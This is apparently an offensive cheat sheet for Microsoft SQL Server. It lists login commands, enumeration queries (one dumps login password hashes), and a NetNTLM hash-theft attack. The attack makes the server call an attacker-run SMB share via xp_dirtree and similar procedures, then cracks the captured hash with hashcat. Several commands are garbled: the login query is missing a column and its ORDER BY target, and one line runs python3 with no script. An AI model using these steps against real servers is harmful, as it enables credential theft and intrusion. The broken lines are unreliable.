
# mssqlclient
impacket-mssqlclient <domain>/<username>:<password>@<ip>

# sqlcmd
sqlcmd -S <IP> -U <username> -P <password> -d <database_name> -Q <query>


-- Get version
SELECT @@version;

-- Get username
SELECT user_name();

-- Get databases
SELECT name FROM master.dbo.sysdatabases;
SELECT * FROM information_schema.schemata;

-- Tables from DB
SELECT * FROM information_schema.tables;

-- Columns from table
SELECT * FROM information_schema.columns;

-- List users
SELECT AS LOGIN, sp.type_desc AS LOGIN_TYPE, sl.password_hash, sp.create_date, sp.modify_date, CASE WHEN sp.is_disabled = 1 THEN "Disabled" ELSE "Enabled" END AS STATUS FROM sys.server_principals sp LEFT JOIN sys.sql_logins sl ON sp.principal_id = sl.principal_id WHERE sp.type NOT IN ("G", "R") ORDER BY;

-- Users and roles
SELECT * FROM sys.database_principals;

Tricks / Attacks

Steal NetNTLM hash

When executing a command on the SQL server which requests resources from the attacker's SMB server, the hash will be captured on that server.

  1. Start an SMB server to capture hash upon request (local).

    sudo python3 -I tun0
    # impacket-smbserver
    sudo impacket-smbserver share ./ -smb2support
  2. Run one of the following commands (remote).

    xp_dirtree "\\<IP>\any\thing\"
    exec master.dbo.xp_dirtree "\\<IP>\anything\"
    EXEC master..xp_subdirs "\\<IP>\anything\"
    EXEC master..xp_fileexist "\\<IP>\anything\"

Cracking the hash

hashcat -m 5600 <hash_file> <wordlist>

Last updated